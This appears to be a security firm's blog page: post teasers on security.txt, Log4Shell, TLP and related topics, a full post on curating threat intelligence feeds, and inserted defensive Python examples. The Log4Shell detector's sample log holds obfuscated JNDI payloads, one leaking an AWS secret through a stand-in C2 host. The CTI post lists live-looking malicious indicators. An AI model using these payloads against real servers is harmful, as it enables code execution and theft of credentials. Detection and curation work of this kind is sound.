Blog

by mrahier96

Dnssecuritytxt: new security best practice or impractical good idea

If you are casually browsing for ways to improve your cyber-security posture, you may not have come across dnssecuritytxt, which is understandable because it is not well known. But we took a look at it and wanted to share our opinion with you.

Security.txt and dnssecuritytxt

A few years ago, a concept called security.txt became popular in the online community after giants such as Google, Facebook or Dropbox started implementing it (it has since been standardized as RFC 9116). The concept is nothing more than a text file placed under the /.well-known/ directory of a website. Its contents? Who to contact when a bug is found, what the company's security policy is, how to encrypt the proof of a vulnerability before sending it over, and even a job page for those who might be interested. You can read this great article, which goes into more detail about security.txt, or visit our implementation of it to see what it looks like at the URL below:
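As an added example (not part of the original post, and not any organisation's real file), here is a small Python checker for the fields a security.txt can carry. The field names, the mandatory Contact and Expires directives and the allowed URI schemes are those of RFC 9116; both sample files are constructed, and the `now` parameter is only there so that the expiry check is reproducible.

```python
"""Parse and sanity-check a security.txt file (field names from RFC 9116).

Added example; the sample files below are constructed, not real.
A PGP-signed file should be verified and unwrapped before being checked.
"""
from datetime import datetime, timezone
from urllib.parse import urlparse

# Fields defined by RFC 9116; Contact and Expires are mandatory.
KNOWN_FIELDS = {"contact", "expires", "encryption", "acknowledgments",
                "preferred-languages", "canonical", "policy", "hiring", "csaf"}
MANDATORY = ("contact", "expires")
SINGLE_VALUE = ("expires", "preferred-languages")
# Allowed URI schemes per field: Contact may be a web, e-mail or phone URI;
# Encryption may also point to a DNS record or an OpenPGP fingerprint URI.
SCHEMES = {
    "contact": ("https", "mailto", "tel"),
    "encryption": ("https", "dns", "openpgp4fpr"),
    "acknowledgments": ("https",), "canonical": ("https",),
    "policy": ("https",), "hiring": ("https",), "csaf": ("https",),
}


def parse_security_txt(text):
    """Return {field-name (lower-case): [values]}; comments and blank lines are skipped."""
    fields = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, value = line.partition(":")
        if not sep or " " in name.strip():
            continue  # not a "Field: value" line
        fields.setdefault(name.strip().lower(), []).append(value.strip())
    return fields


def _parse_ts(value):
    """ISO 8601 date-time -> timezone-aware datetime (accepts a trailing 'Z')."""
    v = value.strip()
    if v[-1:] in ("Z", "z"):
        v = v[:-1] + "+00:00"
    ts = datetime.fromisoformat(v)
    return ts if ts.tzinfo else ts.replace(tzinfo=timezone.utc)


def check_security_txt(text, now=None):
    """Return a list of problems; an empty list means the file looks usable.

    `now` is an ISO 8601 string (defaults to the current time).
    """
    now_ts = _parse_ts(now) if now else datetime.now(timezone.utc)
    fields = parse_security_txt(text)
    problems = []
    for f in MANDATORY:
        if f not in fields:
            problems.append(f"missing mandatory field {f.capitalize()}")
    for f in SINGLE_VALUE:
        if len(fields.get(f, [])) > 1:
            problems.append(f"{f.capitalize()} must appear only once")
    for f in fields:
        if f not in KNOWN_FIELDS:
            problems.append(f"unknown field {f}")
    for f, allowed in SCHEMES.items():
        for v in fields.get(f, []):
            if urlparse(v).scheme.lower() not in allowed:
                problems.append(f"{f.capitalize()} must use one of {allowed}: {v}")
    for v in fields.get("expires", []):
        try:
            exp = _parse_ts(v)
        except ValueError:
            problems.append(f"Expires is not an ISO 8601 date-time: {v}")
            continue
        if exp <= now_ts:
            problems.append(f"file expired on {v}")
        elif (exp - now_ts).days > 366:
            problems.append("Expires is more than a year ahead (RFC 9116 recommends less)")
    return problems


# Constructed samples (example.com is a reserved documentation domain).
GOOD_SAMPLE = """\
# security.txt for example.com (constructed sample)
Contact: mailto:security@example.com
Contact: https://example.com/report-a-vulnerability
Expires: 2024-06-30T00:00:00Z
Encryption: https://example.com/pgp-key.txt
Policy: https://example.com/security-policy
Hiring: https://example.com/jobs
Preferred-Languages: en, fr
"""

BAD_SAMPLE = """\
Contact: http://example.com/report
Policy: https://example.com/security-policy
"""

if __name__ == "__main__":
    for name, sample in (("good", GOOD_SAMPLE), ("bad", BAD_SAMPLE)):
        print(name, check_security_txt(sample, now="2024-01-01T00:00:00Z") or "OK")
```

The bad sample fails twice: Expires is missing and the Contact URI is plain http. Serving the file over HTTPS and keeping Expires within a year are the two points researchers most often find wrong in the wild.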


by mrahier96

From Log4Shell to Text4Shell…

Context: from the Log4Shell vulnerability to Text4Shell

A year ago, the infamous “Log4Shell” vulnerability (CVE-2021-44228) in the Log4j logging library from Apache Logging Services was disclosed. This “Remote Code Execution” (RCE) vulnerability was widely publicized, because the component was ubiquitous and exploitation was trivial. Indeed, Log4Shell was more than just an RCE vulnerability: depending on how it was exploited, it could also be used for data exfiltration via protocols such as DNS, by nesting a lookup such as an environment variable inside the host name the vulnerable application was made to resolve.
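As an added example (not from the original post), the following Python detector scans web-server log lines for Log4Shell-style `${jndi:...}` lookup strings, unwraps the two obfuscations most often seen in scanning traffic (`${lower:j}`/`${upper:j}` and the `${::-j}` default-value trick), and flags nested `${env:...}`/`${sys:...}` lookups inside the callback host, which is the DNS exfiltration pattern mentioned above. The log lines are constructed; 203.0.113.0/24 and example.net are documentation ranges/domains.

```python
"""Detect Log4Shell-style lookup strings in log lines.

Added example: constructed log lines, documentation IPs (203.0.113.0/24)
and a documentation domain (example.net); not from any real incident.
"""
import re

# Obfuscations commonly used to dodge naive "${jndi:" string matching.
_CASE_RE = re.compile(r"\$\{(?:lower|upper):([^}]*)\}", re.I)   # ${lower:j} -> j
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^}]*)\}")                # ${::-j}  -> j
# The lookup itself: ${jndi:<scheme>://<host>[:port]/...}
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s]+)", re.I)
# Nested lookups that leak data when placed in the callback host name.
_NESTED_RE = re.compile(r"\$\{\s*((?:env|sys|java|ctx|main|log4j|date)\s*:[^}]*)\}", re.I)


def normalize(payload):
    """Collapse nested case/default-value lookups until nothing changes."""
    prev = None
    s = payload
    while prev != s:
        prev = s
        s = _CASE_RE.sub(lambda m: m.group(1), s)
        s = _DEFAULT_RE.sub(lambda m: m.group(1), s)
    return s


def scan_line(line):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    s = normalize(line)
    m = _JNDI_RE.search(s)
    if not m:
        return None
    scheme, host = m.group(1).lower(), m.group(2)
    if host.endswith("}"):          # lookup closed right after the host
        host = host[:-1]
    return {
        "scheme": scheme,
        "host": host,
        # e.g. env:AWS_SECRET_ACCESS_KEY -> the value leaves in a DNS query
        "exfil": _NESTED_RE.findall(host),
        "obfuscated": s != line,
    }


def scan_log(lines):
    """Scan an iterable of log lines; return findings with their line index."""
    findings = []
    for idx, line in enumerate(lines):
        f = scan_line(line)
        if f:
            f["index"] = idx
            findings.append(f)
    return findings


# Constructed access-log extract (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a} HTTP/1.1" 400',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}ndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.c2.example.net/a}"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Matching on the normalized string rather than the raw line is what makes the second and third payloads visible; a rule that only greps for the literal `${jndi:` misses both.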


by mrahier96

Manage your vulnerabilities through a Risk-based approach

The number of vulnerabilities grows day by day. Technologies such as web applications and cloud computing are increasingly adopted by organizations, as is teleworking, so more assets are exposed and connected to the internet and the attack surface of organizations keeps growing. At the same time, attackers have shifted their focus from high-severity findings to medium- and low-CVSS ones.


by mrahier96

Traffic Light Protocol (TLP) had a change of colours

A word on FIRST

FIRST is the Forum of Incident Response and Security Teams. Since 1990, when FIRST was founded, its members have resolved an almost continuous stream of security-related attacks and incidents including handling thousands of security vulnerabilities affecting nearly all of the millions of computer systems and networks throughout the world connected by the ever growing Internet.

FIRST brings together a wide variety of security and incident response teams, in particular product security teams, from the government, commercial and academic sectors.

TLP means Traffic Light Protocol, it is a protocol created by the Special Interest Group of FIRST (FIRST TLP SIG).



by mrahier96

Agile threat modeling and the “devil is in the details” idiom

Disclaimer

This post is based on the following elements:

    1. My experience working as a developer (2003-2015) and then as a full-time Application Security Consultant (2015-present).
    2. The training courses I have recently followed on threat modeling.
    3. My regular technical watch of the application security field.

📢 Therefore, it is quite possible that my point of view is wrong in some aspects or biased. In that case, I will be more than happy to get feedback to make my point of view evolve.


by mrahier96

The Principle of Least Privilege | What it is, and how to manage, control and monitor it

Today's context: Covid and teleworking. How is it going?

Remote working is here to stay, requiring companies to maintain their efforts to combat cyber-attacks. Companies are now looking for security solutions that accommodate this new level of flexibility. To adapt to a changing world, some are embracing hybrid work, while others are opting for full-time telecommuting. The goal is the same: to transparently improve workers' working conditions regardless of their location.

If unrestricted access to a customer's IT assets is an integral part of a service provider's business, it leaves both sides exposed. By offering comprehensive Privileged Access Management (PAM) solutions, distributors can secure, manage and monitor access to their own and their customers' privileged accounts, keeping the most valuable keys to the network safe.


by mrahier96

Web ASseMbly: how to understand, debug and mess with it

Introduction

The goal of this post is to provide the basics of WebAssembly (abbreviated “Wasm”), so that the next time you encounter it, you will be able to understand it and test it.

I will not cover all the available instructions as documentation exists for that (see a bit below), but I will try to give you the keys to understand any Wasm code.

Documentation

The documentation for all the instructions in Wasm is available here: https://github.com/sunfishcode/wasm-reference-manual/blob/master/WebAssembly.md

Moreover, a good picture of how to write Wasm code can be found here:
https://learnxinyminutes.com/docs/wasm/

If there is documentation, why this post?

It’s simple:

  • Not everybody knows the basics of reading assembly code, and there are few tools for handling Wasm.
  • The reference manual linked above is, in my opinion, not the most comprehensive one.

So the goal is to address these two points.

by mrahier96

What is Format Preserving Encryption (FPE)?

Format Preserving Encryption, FPE from here on, is a particular form of encryption with the constraint that the output keeps the same format as the input. The format of the data is defined by a character set (called the domain in the article below) and a length. Here are some examples:

  • A 16-digit card number is encrypted to another 16-digit number.
  • A 12-hexadecimal-digit MAC address to another 12-hex-digit string.
  • An email address to another email address.
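To make the constraint concrete, here is an added example (not from the original article): a toy format-preserving cipher in Python, built as a Feistel network over the symbol indices of the domain with HMAC-SHA256 as the round function. It is for illustration only; in production use the NIST SP 800-38G modes (FF1 or FF3-1), which this toy does not implement. The key and the sample card number, MAC address and email address are constructed, and the optional tweak parameter is an assumption borrowed from the FF1 design.

```python
"""Toy format-preserving encryption: a Feistel network over symbol indices.

Added example, not production code: use NIST SP 800-38G FF1/FF3-1 in practice.
The key and sample values below are constructed.
"""
import hashlib
import hmac

ROUNDS = 10                      # even, so the halves end in their original order
DIGITS = "0123456789"
HEX = "0123456789abcdef"
EMAIL_LOCAL = "abcdefghijklmnopqrstuvwxyz0123456789._-"


def _num(digits, radix):
    """Symbol-index list -> integer (big-endian)."""
    n = 0
    for d in digits:
        n = n * radix + d
    return n


def _str(n, length, radix):
    """Integer -> fixed-length symbol-index list."""
    out = []
    for _ in range(length):
        out.append(n % radix)
        n //= radix
    return out[::-1]


def _round(key, rnd, half, radix, length, tweak):
    """PRF round function: HMAC(key, round || len || tweak || half) mod radix**length."""
    data = bytes([rnd, len(half)]) + tweak + b"\x00" + bytes(half)
    mac = hmac.new(key, data, hashlib.sha256).digest()
    return int.from_bytes(mac, "big") % (radix ** length)


def fpe_encrypt(key, plaintext, alphabet, tweak=b""):
    """Encrypt `plaintext` to a string of the same length over the same alphabet."""
    radix = len(alphabet)
    x = [alphabet.index(c) for c in plaintext]   # ValueError if outside the domain
    n = len(x)
    u, v = n // 2, n - n // 2
    a, b = x[:u], x[u:]
    for i in range(ROUNDS):
        m = u if i % 2 == 0 else v                 # length of the half being replaced
        c = (_num(a, radix) + _round(key, i, b, radix, m, tweak)) % radix ** m
        a, b = b, _str(c, m, radix)
    return "".join(alphabet[d] for d in a + b)


def fpe_decrypt(key, ciphertext, alphabet, tweak=b""):
    """Inverse of fpe_encrypt: run the rounds backwards."""
    radix = len(alphabet)
    x = [alphabet.index(c) for c in ciphertext]
    n = len(x)
    u, v = n // 2, n - n // 2
    a, b = x[:u], x[u:]
    for i in reversed(range(ROUNDS)):
        m = u if i % 2 == 0 else v
        c = (_num(b, radix) - _round(key, i, a, radix, m, tweak)) % radix ** m
        a, b = _str(c, m, radix), a
    return "".join(alphabet[d] for d in a + b)


def fpe_encrypt_email(key, address, tweak=b""):
    """Keep the '@' and the domain; encrypt only the local part over EMAIL_LOCAL.

    Toy limitation: the output local part may start or end with '.' or '-'.
    """
    local, domain = address.lower().split("@", 1)
    return fpe_encrypt(key, local, EMAIL_LOCAL, tweak) + "@" + domain


def fpe_decrypt_email(key, address, tweak=b""):
    local, domain = address.split("@", 1)
    return fpe_decrypt(key, local, EMAIL_LOCAL, tweak) + "@" + domain


if __name__ == "__main__":
    key = bytes.fromhex("000102030405060708090a0b0c0d0e0f")   # constructed demo key
    for value, alphabet in (("4111111111111111", DIGITS), ("001a2b3c4d5e", HEX)):
        ct = fpe_encrypt(key, value, alphabet)
        print(value, "->", ct, "->", fpe_decrypt(key, ct, alphabet))
    ct = fpe_encrypt_email(key, "alice.smith@example.com")
    print(ct, "->", fpe_decrypt_email(key, ct))
```

Two properties worth noticing: the cipher is deterministic, so the same card number always maps to the same ciphertext unless a tweak (for instance a record identifier) is supplied; and a very small domain (a single digit, say) offers no meaningful security whatever the algorithm, because the whole codebook can be enumerated.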


by Excellium SA

Cyber threat intelligence feeds: the background

In today’s article, we discuss the background of threat intelligence feeds.

At its simplest, Cyber Threat Intelligence (CTI) is a stream of indicators used to detect cyber threats, including network anomaly indicators. But this is just the tip of the CTI iceberg, the part consumed by SIEM (Security Information and Event Management) appliances.

It is essential to understand the need to prepare or curate CTI.

At CERT-XLM, we actively refine our CTI feeds. This paper discusses the importance of having usable feeds and how CERT-XLM achieves this.


What is a cyber threat intelligence feed?

Intelligence feeds contain indicators related to an identified or possible threat. CTI indicators are called IoCs (Indicators of Compromise) or IoAs (Indicators of Attack). An IoC is evidence that a security breach has occurred: malware signatures, known malicious IP addresses or domains, or the exploitation of vulnerable products/versions, used to detect a compromise reactively. An IoA captures the intention of attackers and the suspicious activity that could lead to persistence or lateral movement.

Indicators can be an IP address used to deliver malware, IP addresses of an attacker's command-and-control servers (hereafter “C2”), URLs of phishing web pages, names or hashes of malicious files, email addresses, and so on.


Where to get your own cyber threat intelligence feed?

The market for CTI sources is heterogeneous. Security solutions such as anti-virus, firewalls or proxies can include proprietary CTI.

VirusTotal [VT], vx-underground [VX] or abuse.ch [Abuse.ch] are open or public CTI sources that allow the download of a variety of samples or IoCs. These platforms are sometimes crowd-sourced with URLs or files submitted by users worldwide.

Platforms such as PhishTank [PhishTank] or OpenPhish [OpenPhish] allow users to report malicious sites that seek to extract user credentials or other sensitive information.

You can create your own CTI platform, which gathers and stores feeds that are relevant to you; this is what CERT-XLM does.

Some feeds are dedicated to one threat, such as OpenPhish for phishing or a particular malware family for one of the abuse.ch trackers. In contrast, others cover a wide variety of known threats, such as the Malware Information Sharing Platform (MISP) community feeds.

“Label all the things!”

The name of a threat is essential information for an analyst. There is no universal CTI naming convention, and each major vendor applies its own. For example, “Emotet” can be found under the names “Feodo”, “Heodo” or “Geodo”. The stealer “Pony” may be labelled “Siplog” or “Fareit”. QakBot is also called “Pinkslipbot”, “QBot” and “Quakbot”.

There are common categories for indicators, such as “C2”, “phishing”, “malware”, “RAT”, “ransomware”, “scanner” and “botnet”. Unfortunately, the categories are not universal either. The MISP community platform has the concept of “galaxies”, which each member can define. The result is that the same threat ends up under several different labels.

The CERT-XLM uniformly labels all threats based on MISP classification standards. Our curated CTI is then applied consistently through SIEM Use Cases.


Don’t lose control over your Cyber Threat Intelligence Feeds

Low-quality CTI feeds result in low-quality indicators.

Here are examples of low-quality CTI indicators due to URL formatting issues (an unresolved template placeholder, a doubled scheme and a misspelled scheme):

  • “http://${ip}:${port}/”
  • “http://ttp://avorlen.xyz”
  • “htttp://188.124.36.242:25802/”


Another content issue is an indicator that contains an RFC 1918 private address (10.0.0.0/8, 172.16.0.0/12 or 192.168.0.0/16): such an address can never identify an external attacker and only generates noise in your environment.

Here is an example of a low-quality CTI indicator that is too specific. The indicator should not include the email address, as this varies with the targeted user:

  • “https://makeyouhappymg.ru.com/20?s3=ngo3g&s1=ppp11&email=valentino@acme.com”

You have to sanitize CTI indicators. Sanitizing CTI content also protects your team from accidentally detonating malware. Here are two examples:

  • http://%D0%B2%D0%BE%D0%B4%D0%B0.net/kE9_6iaxBF_WWLBR8Mxnu
    • The domain is not valid as is: percent-decoded it reads “вода”, a valid internationalized domain, but it has to be re-encoded in its IDNA (punycode) form “xn--80adg3b” for a SIEM.
  • https://viro(.)mleydier(.)en
    • Here the domain is defanged with parentheses, a common practice but left to individual preference: square brackets are also used, and “hxxp” stands for “http”.

CERT-XLM thoroughly tests, decodes, reencodes each indicator, and cleans and discards irrelevant ones.


Come on and grab your own!

Generic CTI content results in a high volume of false positives.

Looking at the four examples below:

  • “http://firebasestorage.googleapis.com”
    • This is a well-known content hosting service. It can be abused, but without the exact path to the malicious object, the domain itself is not malicious.
  • “https://forms.office.com/r/”
    • It is common for attackers to use free online services to host malicious documents, then invite their victims to download and open them as part of a phishing campaign, to avoid detection. Without the identifier (e.g. hxxps://forms.office.com/r/ne89GVwrYE), this is not an indicator of a threat.
  • “172.67.138.4”
    • is not an internal address (172.67.0.0/16 lies outside the RFC 1918 range 172.16.0.0/12) but a public address shared by a large CDN/reverse-proxy infrastructure: it fronts countless domains, not all of them malicious, and the analyst doing reverse DNS research on it must be able to classify the alert.
  • “http://p”
    • is a less common example. This CTI content will generate a lot of alerts in most environments.

CERT-XLM takes extra precautions to avoid CTI content that generates a high volume of false positive alerts.
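The following Python curation pass is an added example (not CERT-XLM's tooling) that applies the checks from the two sections above in one place: refanging, template placeholders and broken schemes, RFC 1918 addresses, victim-specific query parameters, percent-decoding plus IDNA re-encoding of the host, shared hosting services without a specific path, shared CDN addresses and hosts that are not fully qualified. The feed reuses the indicators quoted in the article plus a constructed RFC 1918 entry; the shared-hosting list, the shared address range and the list of victim-identifying parameters are assumptions to be replaced with your own data (the address range in particular should come from your passive DNS).

```python
"""Curate raw CTI indicators before SIEM ingestion.

Added example: the feed mixes the article's examples with constructed
entries; the allow/deny lists are assumptions to replace with your own data.
"""
import ipaddress
import re
from urllib.parse import parse_qsl, unquote, urlencode, urlsplit

_HOST_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)+$")
# Assumption: hosting services that are only an indicator with a specific path.
SHARED_HOSTING = {"firebasestorage.googleapis.com", "forms.office.com"}
# Assumption: ranges fronting many unrelated domains (CDN / reverse proxy);
# populate from your own passive DNS rather than this single entry.
SHARED_RANGES = [ipaddress.ip_network("172.67.0.0/16")]
# Assumption: query parameters that identify the victim, not the threat.
USER_PARAMS = {"email", "e", "user", "username", "login"}


def refang(raw):
    """Undo the usual defanging: hxxp -> http, (.) and [.] -> ., [:] -> :."""
    s = raw.strip().strip('"')
    s = re.sub(r"^hxxp", "http", s, flags=re.I)
    return s.replace("(.)", ".").replace("[.]", ".").replace("[:]", ":")


def check_host(host):
    """Return (canonical_host, status, reason) for a hostname or IP literal."""
    host = unquote(host).rstrip(".").lower()            # %D0%B2... -> вода
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        if (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved):
            return host, "dropped", "non-routable address (RFC 1918 or similar)"
        if any(ip in net for net in SHARED_RANGES):
            return host, "review", "address shared by many domains; analyst must qualify it"
        return host, "kept", ""
    try:
        host = host.encode("idna").decode("ascii")      # вода -> xn--80adg3b
    except UnicodeError:
        return host, "dropped", "hostname cannot be IDNA-encoded"
    if not _HOST_RE.match(host):
        return host, "dropped", "not a fully qualified hostname"
    return host, "kept", ""


def curate(raw):
    """Normalize one raw indicator (URL, hostname or IP) into a SIEM-ready record."""
    rec = {"raw": raw, "status": "dropped", "reason": "", "indicator": None, "domain": None}
    s = refang(raw)
    if "${" in s:
        rec["reason"] = "unresolved template placeholder"
        return rec
    if "://" not in s:                                   # bare host or IP
        host, status, reason = check_host(s)
        rec.update(status=status, reason=reason, domain=host,
                   indicator=host if status != "dropped" else None)
        return rec
    parts = urlsplit(s)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        rec["reason"] = f"unsupported scheme {scheme!r}"
        return rec
    netloc = parts.netloc.rsplit("@", 1)[-1]             # drop any userinfo
    host, _, port = netloc.rpartition(":")
    if not (host and port.isdigit()):
        host, port = netloc, ""
    host, status, reason = check_host(host)
    rec["domain"] = host
    if status == "dropped":
        rec["reason"] = reason
        return rec
    path = parts.path or "/"
    if host in SHARED_HOSTING and len([p for p in path.split("/") if p]) < 2:
        rec["reason"] = "shared hosting service without a specific path"
        return rec
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    kept = [(k, v) for k, v in pairs if k.lower() not in USER_PARAMS]
    url = f"{scheme}://{host}{':' + port if port else ''}{path}"
    if kept:
        url += "?" + urlencode(kept)
    stripped = "stripped victim-specific parameter" if len(kept) != len(pairs) else ""
    rec.update(status=status, indicator=url, reason=reason or stripped)
    return rec


def curate_feed(lines):
    return [curate(line) for line in lines if line.strip()]


# Article examples plus constructed entries (10.0.0.12 is RFC 1918).
SAMPLE_FEED = [
    "http://${ip}:${port}/",
    "http://ttp://avorlen.xyz",
    "htttp://188.124.36.242:25802/",
    "10.0.0.12",
    "https://makeyouhappymg.ru.com/20?s3=ngo3g&s1=ppp11&email=valentino@acme.com",
    "http://%D0%B2%D0%BE%D0%B4%D0%B0.net/kE9_6iaxBF_WWLBR8Mxnu",
    "https://viro(.)mleydier(.)en",
    "http://firebasestorage.googleapis.com",
    "https://forms.office.com/r/",
    "hxxps://forms.office.com/r/ne89GVwrYE",
    "172.67.138.4",
    "http://p",
]

if __name__ == "__main__":
    for rec in curate_feed(SAMPLE_FEED):
        print(f'{rec["status"]:8} {rec["indicator"] or rec["raw"]:60} {rec["reason"]}')
```

Dropped entries keep their reason so an analyst can recover the ones that are only typos (the misspelled scheme in front of a public IP, for instance) instead of silently losing them; the "review" status keeps the shared CDN address out of automatic alerting without discarding it.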


Adapting your cyber threat intelligence feed to your SIEMs capabilities

It is important to have TLS (still often called SSL) decryption as part of your security architecture. Without it, your SIEM has less useful information: only the visited domains (from DNS or the TLS SNI) are recorded, not the full URLs, so URL indicators cannot match.

Your SIEM may also have software limitations. The first limitation could be the number of indicators it can ingest at one time. Other limitations will come from the functionalities of the SIEM, as none of them is perfect.

Unfortunately, some SIEMs only do exact matches: no alert will be raised for a visit to https://walletsdappvalidation.com/ when the indicator is “https://walletsdappvalidation.com/?u”.


Test, test and test again

It is essential to validate your CTI content.

CERT-XLM evaluates CTI content in an isolated environment, to reduce the risk of incidents caused by connecting to the indicators.

We then evaluate:

  • How redundant are the indicators with what you already have? Measure how many indicators match things already blocked by your firewalls, proxies, anti-virus and other perimeter security solutions.
  • What proportion of the indicators will generate false positives? This can be measured offline by searching for the indicators in an extract of your traffic.
  • How much reprocessing is required before ingestion by the SIEM? If there is no TLS termination in your traffic, you will at a minimum need to extract domains from URLs. You will need strategies to counter false positives, as described above. Reprocessing also involves cleaning up the recoverable indicators, as described in the section on keeping control of your feeds.
  • What is the proportion of waste? This means counting the unusable indicators, as described in that same section, plus those that generate false positives.

Only these quantifiable answers will allow you to conclude whether the feed is worthwhile.
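As an added example (not CERT-XLM's tooling), the following Python function scores a feed offline against an extract of proxy traffic along the lines of the questions above: redundancy with domains already blocked, how many indicators match exactly versus only at the domain level (the exact-match SIEM limitation from the previous section), and which domain-level matches are so frequent in normal traffic that they would only produce false positives. The feed, proxy log and block list are constructed; two URLs are reused from the article, the clients sit in 10.0.0.0/8 and the other domains are reserved example names.

```python
"""Score a CTI feed offline against a proxy-log extract before SIEM ingestion.

Added example: feed, proxy log and block list are constructed (they reuse
two URLs quoted in the article); not real traffic.
"""
from collections import Counter
from urllib.parse import urlsplit


def domain_of(url):
    """Hostname part of a URL (or of a bare hostname)."""
    return (urlsplit(url if "://" in url else "//" + url).hostname or "").lower()


def evaluate_feed(indicators, proxy_log, already_blocked, fp_threshold=0.10):
    """Return per-indicator rows and a summary.

    proxy_log: list of (client_ip, url) tuples extracted from your proxy.
    already_blocked: domains your proxy/firewall already denies (redundancy).
    fp_threshold: share of all visits above which a domain-level match is
    considered too common to alert on (likely false positive).
    """
    visits = [url for _, url in proxy_log]
    total = len(visits)
    exact = Counter(visits)
    per_domain = Counter(domain_of(u) for u in visits)
    rows = []
    for ind in indicators:
        d = domain_of(ind)
        e_hits, d_hits = exact[ind], per_domain[d]
        rows.append({
            "indicator": ind,
            "domain": d,
            "redundant": d in already_blocked,
            "exact_hits": e_hits,
            "domain_hits": d_hits,
            # visited, but never with this exact URL: an exact-match SIEM misses it
            "needs_domain_indicator": e_hits == 0 and d_hits > 0,
            "domain_fp_risk": total > 0 and d_hits / total > fp_threshold,
        })
    summary = {
        "indicators": len(rows),
        "redundant": sum(r["redundant"] for r in rows),
        "exact_detections": sum(r["exact_hits"] > 0 for r in rows),
        "domain_detections": sum(r["domain_hits"] > 0 for r in rows),
        "needs_domain_indicator": sum(r["needs_domain_indicator"] for r in rows),
        "domain_fp_risk": sum(r["domain_fp_risk"] for r in rows),
        "unseen": sum(r["domain_hits"] == 0 for r in rows),
    }
    return {"rows": rows, "summary": summary}


# Constructed feed and traffic extract.
FEED = [
    "https://walletsdappvalidation.com/?u",
    "https://forms.office.com/r/ne89GVwrYE",
    "http://avorlen.xyz/",
    "https://known-bad.example/",
]
PROXY_LOG = (
    [("10.0.0.4", "https://walletsdappvalidation.com/")] * 2
    + [("10.0.0.7", "https://forms.office.com/r/abcd1234")] * 5
    + [("10.0.0.8", "https://forms.office.com/r/ne89GVwrYE")]
    + [("10.0.0.9", "https://intranet.example.com/home")] * 10
    + [("10.0.0.4", "https://known-bad.example/")]
    + [("10.0.0.5", "https://www.example.org/news")] * 6
)
ALREADY_BLOCKED = {"avorlen.xyz"}

if __name__ == "__main__":
    result = evaluate_feed(FEED, PROXY_LOG, ALREADY_BLOCKED)
    for row in result["rows"]:
        print(row)
    print(result["summary"])
```

In this extract the walletsdappvalidation.com indicator is only ever reached without its `?u` suffix, so an exact-match SIEM would never alert on it and a domain-level indicator is needed, whereas forms.office.com is visited so often that a domain-level indicator for it would be pure noise and only the full URL is worth loading.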

CERT-XLM also recommends the use of a passive DNS database. This allows extended searches to be performed without consuming SIEM resources. If matches are found, a search over a short time window in the SIEM with the full indicator will allow you to conclude whether it is a false positive or a true positive.

Cyber threat intelligence feeds: what to conclude?

There are a lot of details to keep in mind when integrating CTI content with a SIEM. This is why CERT-XLM recommends applying a structured approach to curating CTI content.

